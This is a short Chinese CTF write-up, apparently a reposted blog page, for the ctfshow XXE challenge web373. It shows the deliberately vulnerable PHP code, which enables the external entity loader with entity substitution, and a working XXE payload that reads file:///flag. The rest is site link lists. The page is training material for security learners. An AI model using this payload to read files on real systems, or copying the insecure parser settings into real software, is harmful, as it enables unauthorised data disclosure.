ctfshow xxe

其他 2021-12-14 20:56:38 阅读次数: 0

前置知识

理解漏洞之 XXE 漏洞

从XML相关一步一步到XXE漏洞

参考WP

web373

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    
    
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

payload:

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yn8rt>
<ctfshow>&xxe;</ctfshow>
</yn8rt>

猜你喜欢

转载自blog.csdn.net/qq_50589021/article/details/120881232

ctfshow_XXE

ctfshow xxe

CTFSHOW XXE通关指南

ctfshow XXE web373-web378 wp

xxe

xxe方法

XXE漏洞

XXE总结

CTF XXE

11.19 XXE

Blind XXE

Normal XXE

XXE注入

xxe靶机

XXE（1）

CTFshow——SSRF

【XXE】XXE漏洞攻击与防御

XXE漏洞——xml外部实体注入XXE

XXE漏洞学习

xxe漏洞呀

XmlDocument 避免XXE

xxe漏洞实战

浅谈XXE攻击

XML防止XXE攻击

XXE Lab：1题解

xxe漏洞深度剖析

XXE进阶——OOB攻击

xxe漏洞学习（2）

xxe漏洞学习（1）

PHP XXE漏洞

今日推荐

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

周排行

Family Tree 题解

BZOJ 1093 最大半连通子图 SCC + DP

幂等处理

Spring----学习（2）----XML 配置Bean 自动装配

SQL Server 远程更新目标表数据

HIbernate3.6 环境搭建

特殊符号正则表达式

【Linux】第一章进程的理解

843. n-皇后问题（dfs+输出各种情况）

空间数据库2

每日归档

更多

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)